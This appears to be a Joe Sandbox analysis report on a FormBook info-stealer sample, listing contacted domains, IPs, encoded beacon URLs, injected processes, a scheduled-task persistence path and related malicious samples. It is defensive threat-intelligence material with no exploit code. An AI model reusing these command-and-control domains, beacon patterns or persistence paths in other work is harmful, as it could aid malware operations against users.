http://js.ad-stir.com/js/adstir.js?20130527	0%	Avira URL Cloud	safe
http://www.desakedungpeluk.com/8vum/?9Fjx=mMAT0VmYBXrn84GDY3jN9eT5aVT33QlPc8t3UynAD89QghEERF9j2st9BPanxmMeaSIDnLSTLKjuqvUky6NP4LhFqV3UnyKctbAktMQsAL9RdihXFK7EH5ocxuixaBnvMu0t3gQ=&h20PB=Ilr0H	0%	Avira URL Cloud	safe
https://static.minne.com/files/banner/minne_600x500	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.ngkwnq.xyz	35.241.41.54	true	false		unknown
www.tcfreal.top	203.161.50.128	true	false		unknown
hermandadcoyotes.com	188.95.113.62	true	false		unknown
www.michaelstutorgroup.com.cdn.hstgr.net	84.32.84.178	true	false		unknown
desakedungpeluk.com	202.52.146.180	true	false	0%, Virustotal, Browse	unknown
miquwawa.com	95.169.27.235	true	false	0%, Virustotal, Browse	unknown
artistcalculator.com	162.241.216.26	true	false	0%, Virustotal, Browse	unknown
www.exporationgenius.sbs	188.114.97.3	true	false		unknown
www.noghteyab.com	51.89.93.192	true	false		unknown
www.zocalo-fuk.com	157.7.107.37	true	false	0%, Virustotal, Browse	unknown
redirect.3dns.box	172.191.244.62	true	false		unknown
dkimhub.com	3.33.130.190	true	false	1%, Virustotal, Browse	unknown
loangoatworld.com	3.33.130.190	true	false		unknown
forthelement.com	3.33.130.190	true	false	1%, Virustotal, Browse	unknown
www.loangoatworld.com	unknown	unknown	true		unknown
www.forthelement.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.miquwawa.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.dkimhub.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.hermandadcoyotes.com	unknown	unknown	true		unknown
www.xyz-store.xyz	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.desakedungpeluk.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.artistcalculator.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
206.23.85.13.in-addr.arpa	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.michaelstutorgroup.com	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.tcfreal.top/sg27/	false	Avira URL Cloud: safe	unknown
http://www.dkimhub.com/5egn/?9Fjx=LS7e07ng+gHNsyJARIPtuVi+lEkqNBJQ2ublElNdV5gzbr2xH6h/El6SaWwjRr8Uba16H88ExuT+84ut878T3wBrsvgB0imO00p96tUlW1EzL/ongopUwV5X18HPxTdgNiqUy4Q=&h20PB=Ilr0H	false	Avira URL Cloud: safe	unknown
http://www.michaelstutorgroup.com/7w90/	false	Avira URL Cloud: safe	unknown
http://www.zocalo-fuk.com/iczo/?h20PB=Ilr0H&9Fjx=JY7jtaSJ5x5vzidknG2ksTpeyXyaG7X3ywH460gVL7Ewt7sZ57bb2J66wgBGIrGl5fwva+984CsI5kCUEaeHAKxito/MplmCBaK67oIqKDsPwPbc7aid6ru9XlM638WWQIDRvms=	false	Avira URL Cloud: safe	unknown
http://www.hermandadcoyotes.com/gx7l/	false	Avira URL Cloud: safe	unknown
http://www.loangoatworld.com/8y3s/?9Fjx=m+e1HwtEOOeM4G5OXbOM1l1mMhEELbDuBR7SzEsfX5sQt5Y/60pxewufhKo1oWdPn8Rq+iGyekpfb4U1GvT2jbL6nhhjvrxd94xSxVO4NFUPY0kg0texG8HyL5tYcYoZK9KCXOc=&h20PB=Ilr0H	false	Avira URL Cloud: safe	unknown
http://www.forthelement.com/eswm/	false	Avira URL Cloud: safe	unknown
http://www.michaelstutorgroup.com/7w90/?h20PB=Ilr0H&9Fjx=LhHpT0ljoQdAbtFlhTdeffbRPZ2ExzZlgOFaGkCDeg3jH9QMg622Z6S/PpXr7Dw5Hrqt15Rk+HZEJRRYk4+G8611O/TYHNVjD8KHzBwMH6yNIySy4kYDr0sQvZqeQkDTLiMYeJ4=	false	Avira URL Cloud: safe	unknown
http://www.miquwawa.com/tqql/?h20PB=Ilr0H&9Fjx=u0XZF227Y/r9f3hknYKw3A/OKyua8wzaE5MpTM9c21roNqnsj5Gisp9VcwCWuR5N2hVTeUiUKYj3c1cP+6QCcj3wzwE0gmMNT1PJlFHdnkMlbksrXDYRbbL33cvAUMoN8r+Pi3M=	false	Avira URL Cloud: safe	unknown
http://www.zocalo-fuk.com/iczo/	false	Avira URL Cloud: safe	unknown
http://www.artistcalculator.com/pf6m/?9Fjx=bj2jTCh2dAa0W37Ors9MIV8y6VuL4TB52i9XdK5qnE1eDYGuKlwknV9AdIGtnY1bTK6+aXD2gMPFTRYJsf/RVFQwT4yLxuuIQKRkes7NkFHq0brUctiaXa3KGHH0n3cgm+LnNOk=&h20PB=Ilr0H	false	Avira URL Cloud: safe	unknown
http://www.dkimhub.com/5egn/	false	Avira URL Cloud: safe	unknown
http://www.noghteyab.com/f97t/	false	Avira URL Cloud: safe	unknown
http://www.ngkwnq.xyz/d35k/	false	Avira URL Cloud: safe	unknown
http://www.desakedungpeluk.com/8vum/	false	Avira URL Cloud: safe	unknown
http://www.hermandadcoyotes.com/gx7l/?9Fjx=a7hzNdnkeS27kktwRLGSx8yR2sA6hGpGYEa4s+kW8/8nhO4qbMwiGFPThwQr7Jt1vJRCiF4mQ47wrk5EK+BQCUwjbLnD+Licdnqi1ONE6USu+A5nC085uF77bSHLzlvxtDSsS9g=&h20PB=Ilr0H	false	Avira URL Cloud: safe	unknown
http://www.artistcalculator.com/pf6m/	false	Avira URL Cloud: safe	unknown
http://www.xyz-store.xyz/ixgj/?9Fjx=/Zj6VqX56ByDodokLRjPKDm3Pwn2S1h1h7pQZ2SgqDdN9OrisfEzogZ++nqPS1/BV9/5rcururFkQ+JMtWq084ODcNTM6ri6BugJHEDlWjTEcfv6bdNq3ciQP3N1zgfhFVTfb+g=&h20PB=Ilr0H	false	Avira URL Cloud: safe	unknown
http://www.xyz-store.xyz/ixgj/	false	Avira URL Cloud: safe	unknown
http://www.tcfreal.top/sg27/?9Fjx=cpYt0YSQq6qumPKnLg+mC8LQzbjhCfVjUwEln5zritMpGV/+kM1tERFpp4gfmVNp46bstuO0H+g7H2/quwpl6ls6SEGImodBdGoSGHjCZU2G7An66QSlhEKUMH7zQGocUjr8wdY=&h20PB=Ilr0H	false	Avira URL Cloud: safe	unknown
http://www.loangoatworld.com/8y3s/	false	Avira URL Cloud: safe	unknown
http://www.desakedungpeluk.com/8vum/?9Fjx=mMAT0VmYBXrn84GDY3jN9eT5aVT33QlPc8t3UynAD89QghEERF9j2st9BPanxmMeaSIDnLSTLKjuqvUky6NP4LhFqV3UnyKctbAktMQsAL9RdihXFK7EH5ocxuixaBnvMu0t3gQ=&h20PB=Ilr0H	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://htmlcodex.com	findstr.exe, 00000012.00000002.4531782947.00000000043DA000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.000000000366A000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	findstr.exe, 00000012.00000002.4534379410.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js	findstr.exe, 00000012.00000002.4534198361.0000000006350000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4531782947.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.0000000003CB2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	findstr.exe, 00000012.00000002.4534379410.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.jsdelivr.net/npm/bootstrap	findstr.exe, 00000012.00000002.4531782947.00000000043DA000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.000000000366A000.00000004.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js	findstr.exe, 00000012.00000002.4534198361.0000000006350000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4531782947.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.0000000003CB2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://track.uc.cn/collect	findstr.exe, 00000012.00000002.4534198361.0000000006350000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4531782947.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.0000000003CB2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	findstr.exe, 00000012.00000002.4534379410.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.michaelstutorgroup.com/7w90/?h20PB=Ilr0H&9Fjx=LhHpT0ljoQdAbtFlhTdeffbRPZ2ExzZlgOFaGkCDeg	findstr.exe, 00000012.00000002.4531782947.0000000004ED8000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.0000000004168000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lolipop.jp/	findstr.exe, 00000012.00000002.4531782947.0000000004248000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.00000000034D8000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://pepabo.com/	findstr.exe, 00000012.00000002.4531782947.0000000004248000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.00000000034D8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/recaptcha/api.js?hl=en	findstr.exe, 00000012.00000002.4531782947.000000000456C000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.00000000037FC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://hm.baidu.com/hm.js?	findstr.exe, 00000012.00000002.4534198361.0000000006350000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4531782947.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.0000000003CB2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	findstr.exe, 00000012.00000002.4534379410.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js	findstr.exe, 00000012.00000002.4534198361.0000000006350000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4531782947.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.0000000003CB2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	8SxJ9aYfJ1.exe, 00000000.00000002.2120693064.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, TwkYThKVQVaYn.exe, 0000000B.00000002.2301461883.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css	findstr.exe, 00000012.00000002.4534198361.0000000006350000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4531782947.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.0000000003CB2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.artistcalculator.com	sbJGUdSMCgtLQJ.exe, 00000017.00000002.4532261432.000000000526C000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.lolipop.jp/hc/ja/articles/360049132953	findstr.exe, 00000012.00000002.4531782947.0000000004248000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.00000000034D8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark	findstr.exe, 00000012.00000002.4534198361.0000000006350000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4531782947.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.0000000003CB2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/dxsss.xsd	8SxJ9aYfJ1.exe, TwkYThKVQVaYn.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css	findstr.exe, 00000012.00000002.4531782947.00000000043DA000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.000000000366A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	findstr.exe, 00000012.00000002.4534379410.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404	findstr.exe, 00000012.00000002.4531782947.0000000004248000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.00000000034D8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif	findstr.exe, 00000012.00000002.4531782947.0000000004248000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.00000000034D8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://code.jquery.com/jquery-3.4.1.min.js	findstr.exe, 00000012.00000002.4531782947.00000000043DA000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.000000000366A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	findstr.exe, 00000012.00000002.4534379410.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	findstr.exe, 00000012.00000002.4531782947.0000000003BEC000.00000004.10000000.00040000.00000000.sdmp, findstr.exe, 00000012.00000002.4527435525.000000000301C000.00000004.00000020.00020000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000000.2549091116.0000000002E7C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2801131487.000000003DD6C000.00000004.80000000.00040000.00000000.sdmp, 8SxJ9aYfJ1.exe, TwkYThKVQVaYn.exe.0.dr	false	URL Reputation: safe	unknown
https://cdn.jsdelivr.net/npm/bootstrap-icons	findstr.exe, 00000012.00000002.4531782947.00000000043DA000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.000000000366A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js	findstr.exe, 00000012.00000002.4534198361.0000000006350000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4531782947.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.0000000003CB2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://miquwawa.com/tqql/?h20PB=Ilr0H&9Fjx=u0XZF227Y/r9f3hknYKw3A/OKyua8wzaE5MpTM9c21roNqnsj5Gisp9Vc	findstr.exe, 00000012.00000002.4531782947.0000000003F24000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.00000000031B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2801131487.000000003E0A4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	findstr.exe, 00000012.00000002.4534379410.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://js.ad-stir.com/js/adstir.js?20130527	findstr.exe, 00000012.00000002.4531782947.0000000004248000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.00000000034D8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://htmlcodex.com/credit-removal	findstr.exe, 00000012.00000002.4531782947.00000000043DA000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.000000000366A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	findstr.exe, 00000012.00000002.4534379410.0000000007D98000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://static.minne.com/files/banner/minne_600x500	findstr.exe, 00000012.00000002.4531782947.0000000004248000.00000004.10000000.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4530233128.00000000034D8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
203.161.50.128	www.tcfreal.top	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	false
172.191.244.62	redirect.3dns.box	United States	7018	ATT-INTERNET4US	false
51.89.93.192	www.noghteyab.com	France	16276	OVHFR	false
188.114.97.3	www.exporationgenius.sbs	European Union	13335	CLOUDFLARENETUS	false
202.52.146.180	desakedungpeluk.com	Indonesia	45324	GMEDIA-AS-IDGlobalMediaTeknologiPTID	false
188.95.113.62	hermandadcoyotes.com	Spain	50926	INFORTELECOM-ASES	false
157.7.107.37	www.zocalo-fuk.com	Japan	7506	INTERQGMOInternetIncJP	false
35.241.41.54	www.ngkwnq.xyz	United States	15169	GOOGLEUS	false
95.169.27.235	miquwawa.com	Canada	25820	IT7NETCA	false
3.33.130.190	dkimhub.com	United States	8987	AMAZONEXPANSIONGB	false
84.32.84.178	www.michaelstutorgroup.com.cdn.hstgr.net	Lithuania	33922	NTT-LT-ASLT	false
162.241.216.26	artistcalculator.com	United States	46606	UNIFIEDLAYER-AS-1US	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483390
Start date and time:	2024-07-27 08:04:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	3
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	8SxJ9aYfJ1.exe renamed because original name is a hash value
Original Sample Name:	e8b4997fd647c6236e8d6a5460724cee.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@27/16@15/12
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 94% Number of executed functions: 224 Number of non-executed functions: 271
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:04:50	API Interceptor	1x Sleep call for process: 8SxJ9aYfJ1.exe modified
02:04:52	API Interceptor	32x Sleep call for process: powershell.exe modified
02:04:55	API Interceptor	1x Sleep call for process: TwkYThKVQVaYn.exe modified
02:06:07	API Interceptor	12306797x Sleep call for process: findstr.exe modified
08:04:52	Task Scheduler	Run new task: TwkYThKVQVaYn path: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
203.161.50.128	Document.exe	Get hash	malicious	FormBook	Browse	www.tcfreal.top/sg27/
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.8256.26893.rtf	Get hash	malicious	FormBook	Browse	www.tcfreal.top/sg27/
	PR-ZWL 07364G49574(Revised PO).exe	Get hash	malicious	FormBook	Browse	www.fusionndustries.xyz/bnz5/
	YPR010098- Quote- PFI.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.nexusenovations.online/u88q/
	PO_INdllc0987633.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.nexusenovations.online/u88q/
	SHIPMT-97 6533 1936ROBUTECH.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.nexusenovations.online/u88q/
	PO_PDF24172024.scr.exe	Get hash	malicious	FormBook	Browse	www.fusionndustries.xyz/bnz5/
	RFQ.exe	Get hash	malicious	FormBook	Browse	www.fusionndustries.xyz/bnz5/
	BL4567GH67_xls.exe	Get hash	malicious	FormBook	Browse	www.momentumholdings.top/n8t5/
	Scan Document Copy_docx.exe	Get hash	malicious	FormBook	Browse	www.momentumholdings.top/n8t5/
172.191.244.62	HSBC Bank_Approvel Letter.exe	Get hash	malicious	FormBook	Browse	www.xyz-store.xyz/9egw/
51.89.93.192	docs_pdf.exe	Get hash	malicious	FormBook	Browse	www.noghteyab.com/wlsq/?D0Pts04=9G9JaQreu1q7pVWdntSqemfrZt4YMEwdEWH52d0+9tQM8/+noicIREkWd/c/vCZ1acCjjeuAo42rGPHTfjnYxH4zd6/SeR7TYZgVkfp3oOFdRtlOKMiyqIOaPcilhWS9JI76xLs=&Q8s=tdcd5h7ptjmdxx
51.89.93.192	Document.exe	Get hash	malicious	FormBook	Browse	www.noghteyab.com/f97t/
188.114.97.3	o4iytkmhqh.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	660256cm.nyashka.top/javascriptsecurelowWindows.php
	RFQ#51281AOLAI.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	tny.wtf/dGa
	DHL Shipment Notification 490104998009.xls	Get hash	malicious	Remcos	Browse	tny.wtf/
	Purchase Inquiry.xla.xlsx	Get hash	malicious	Remcos	Browse	tny.wtf/
	AWD 490104998518.xls	Get hash	malicious	Remcos	Browse	tny.wtf/sA
	RFQ#51281AOLAI.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	tny.wtf/
	RFQ#51281AOLAI.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	tny.wtf/
	#U00d6DEME TAVS#U0130YES#U0130.xls	Get hash	malicious	Remcos	Browse	tny.wtf/4Gs
	Notepad3_v6.23.203.2.exe	Get hash	malicious	Amadey, GO Backdoor	Browse	downloaddining2.com/h9fmdW6/index.php
	Quotation.exe	Get hash	malicious	FormBook	Browse	www.bahisanaliz16.xyz/ty31/?nfuxZr=JoA2dMXfLBqFXt4x+LwNr+felGYfgJXJPNkjuKbt07zo6G2Rowrau43mkNbOTfffhSkjLsiciQ==&v6AxO=1bjHLvGh8ZYHMfZp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.noghteyab.com	docs_pdf.exe	Get hash	malicious	FormBook	Browse	51.89.93.192
	Document.exe	Get hash	malicious	FormBook	Browse	51.89.93.192
	SHIPPING DOCS_pdf.exe	Get hash	malicious	FormBook	Browse	51.89.93.193
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.8256.26893.rtf	Get hash	malicious	FormBook	Browse	46.105.190.248
	purchase order_pdf.exe	Get hash	malicious	FormBook	Browse	51.89.93.193
	arrival notice_pdf.exe	Get hash	malicious	FormBook	Browse	51.89.93.193
www.zocalo-fuk.com	Document.exe	Get hash	malicious	FormBook	Browse	157.7.107.37
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.8256.26893.rtf	Get hash	malicious	FormBook	Browse	157.7.107.37
	Your file name without extension goes here.exe	Get hash	malicious	FormBook	Browse	157.7.107.37
www.tcfreal.top	Document.exe	Get hash	malicious	FormBook	Browse	203.161.50.128
www.tcfreal.top	SecuriteInfo.com.Exploit.CVE-2017-11882.123.8256.26893.rtf	Get hash	malicious	FormBook	Browse	203.161.50.128
redirect.3dns.box	HSBC Bank_Approvel Letter.exe	Get hash	malicious	FormBook	Browse	172.191.244.62
www.exporationgenius.sbs	Document.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
www.exporationgenius.sbs	SecuriteInfo.com.Exploit.CVE-2017-11882.123.8256.26893.rtf	Get hash	malicious	FormBook	Browse	188.114.97.3
www.michaelstutorgroup.com.cdn.hstgr.net	OPEN BALANCE.exe	Get hash	malicious	FormBook	Browse	84.32.84.65
www.michaelstutorgroup.com.cdn.hstgr.net	payment swift 77575.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	154.62.105.32

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ATT-INTERNET4US	205.185.120.123-skid.mpsl-2024-07-27T08_45_37.elf	Get hash	malicious	Mirai, Moobot	Browse	108.89.20.181
	https://www.kudoboard.com/boards/ZWwsi9jg	Get hash	malicious	Unknown	Browse	13.32.23.123
	93g0DCqh1e.elf	Get hash	malicious	Mirai	Browse	98.98.91.118
	xZ2Ha9PYPn.elf	Get hash	malicious	Mirai	Browse	172.142.115.178
	AKPSrAWl2G.elf	Get hash	malicious	Mirai	Browse	70.242.25.160
	rLog7rmU2e.elf	Get hash	malicious	Mirai	Browse	107.79.252.227
	WIwTo1UTMq.elf	Get hash	malicious	Mirai	Browse	67.66.79.207
	VvlYJBzLuW.elf	Get hash	malicious	Mirai	Browse	13.175.156.165
	https://arborstaff.freshdesk.com/en/support/solutions/articles/153000192392-new-docucment-shared-with-you	Get hash	malicious	HTMLPhisher	Browse	13.32.27.6
	https://disney.apexanalytix.com/Help/DownloadFile?ID=P%2fgMga3n7lQ%3d	Get hash	malicious	Unknown	Browse	13.32.13.5
CLOUDFLARENETUS	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	104.26.2.16
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	188.114.96.3
	https://www.kudoboard.com/boards/ZWwsi9jg	Get hash	malicious	Unknown	Browse	172.67.37.149
	NsCTgrwBjQ.exe	Get hash	malicious	Unknown	Browse	172.67.177.136
	NsCTgrwBjQ.exe	Get hash	malicious	Unknown	Browse	172.67.177.136
	https://forms.office.com/r/Rv9K1pC66n	Get hash	malicious	Unknown	Browse	104.17.112.233
	https://f522my.fi79.fdske.com/ec/gAAAAABmpB7T0a5uPS5ojzr4t_T3OUm-FdnelJXDBC1VoV6m2V3L_fPLJYD_I4iovDAQynFwUxenvGcRNh2X00urBe5-4u-rT9GnyUh1X4xs-bp1jFgbdnQWjG990ZIV-3jiRSF6xm2yQVII0IUZNMTwe6xA7L7bXWw_begThms8P6liFgUdG6VQSYwrbqAxhU2UEyqaypup8CoqX1XTXX22SapdlozSl3U2FuKV8U9lz4_YoWYvXaj9erwugsbbIzwuyoMgDRxdh9iJQFak65dYgkq2tGXY1LV-S0k2sDgZf7wEDr63jmpMQO3SzqMfQA3mGK6zccUXpwE0i3r8hj5z4np9jw5lE8Wcp6N7QIvI_qpBMTJqfmuaZZdQ5LOQYKgqx2tl9eUzVwZBUsvbcRUHD4gPhSo47eQGLiImSy0uueaOd9GD5v-xXSggcJV4oiu3m7MRPADdbsVfsrtFilW1dPy_5ezRxo0JN8be1WWGWOeTVzt3fK4=	Get hash	malicious	Unknown	Browse	104.16.117.116
